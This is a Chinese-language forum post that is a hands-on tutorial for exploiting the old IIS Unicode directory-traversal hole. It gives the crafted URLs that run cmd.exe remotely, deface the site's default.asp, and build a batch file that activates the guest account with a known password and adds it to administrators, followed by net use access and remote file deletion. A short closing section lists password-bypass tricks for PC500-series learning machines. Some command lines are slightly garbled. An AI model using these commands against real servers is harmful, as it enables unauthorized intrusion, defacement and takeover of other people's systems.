PersonalCorpus 版 (精华区)

果对放有unicodi漏洞的话： 
先把c:\winnt\system32\cmd.exe 拷贝到了c:\inetpub\scripts\ccc.exe拷贝，cmd.exe(必须改名)方法： http://ip/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe
这时c:\winnt\system32\cmd.exe已经拷贝到了c:\inetpub\scripts\ccc.exe 
通过http://ip/scripts/ccc.exe?/c+dir+c:\可以看到c:\文件。 
我们就可以调用到cmd.exe了，就是说不用那个编码了。 ;+c:\inetpub\wwwroot\default.asp target=_blank>http://ip/scripts/ccc.exe?/c+echo+hack+by+chinese+>;;+c:\inetpub\wwwroot\default.asp 
http://192.168.8.48/scripts/ccc.exe?/c+echo+1/5/2001+>;;>+c:\inetpub\wwwroot\default.asp 
主页面就被修改成了： 
hack by chinese 
1/5/2001 
也就是说，已经把他的主页黑了。 
当然，我们也不能只停留在黑主页的地步，当然想进一步控制整个机器了。 
方法： 
编写.bat执行文件： 
1.打开ie，输入：http://ip/scripts/cmd.exe?/c;dir 怎么样？有cmd.exe文件了吧？这我们就完成了第一步； 
2.http://ip/scripts/cmd.exe?/c;echo net user guest /active:yes>go.bat 
3.http://ip/scripts/cmd.exe?/c;echo net user guest chinese>>go.bat 
4.http://ip/scripts/cmd.exe?/c;echo net localgroup administrators /add guest>>go.bat 
5.http://ip/scripts/cmd.exe?/c;type go.bat 看看我们的批文件内容是否如下： 
net user guest /active:yes 
net user guest chinese 
net localgroup administrators /add guest 
然后在： http://ip/scripts/go.bat;
在磁盘当前位置执行. 
他的guest密码就是“chinese” 而且是超级用户。 
然后你就可以: net use \\ip\ipc$ "chinese" /user:"guest" 
其余的net命令在这我就不都说了！ 


当然你也可以: 
执行：
http://***.***.***.***/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
发现列出了远程主机c:\下的所有文件执行： 
http://***.***.***.***/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy    
 ?\autoexec.bat+c:\autoexec.bak 成功实现文件的复制， 执行：
http://***.***.***.***/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+del%20
c:\autoexec.bak成功实现文件的删除他的guest密码就是“chinese” 而且是超级用户。
然后你就可以: net use \\ip\ipc$ "chinese" /user:"guest" 
其余的net命令在这我就不都说了
 

PC1000/CC800破解密码法 
开机,进入gvbaisc系统， 输入程序:10 PRINT“系统密码：”；：FOR I=8136 TO 8141 
：PRINT CHR$（PEEK（I））；：NEXT I：PRINT 20 PRINT“游戏密码：”；：FOR I=8 
142 TO 8147：PRINT CHR$（PEEK（I））；：NEXT I：PRINT 再RUN一下就可以了！其中 
10和20是程序标号。你就可以看到你的系统和游戏密码了！ 
cc300/pc500/pc505解密方法 
在pc500.pc505.cc300的"时间"状态下输入matoid 即可解除系统密码.资料不丢失!!!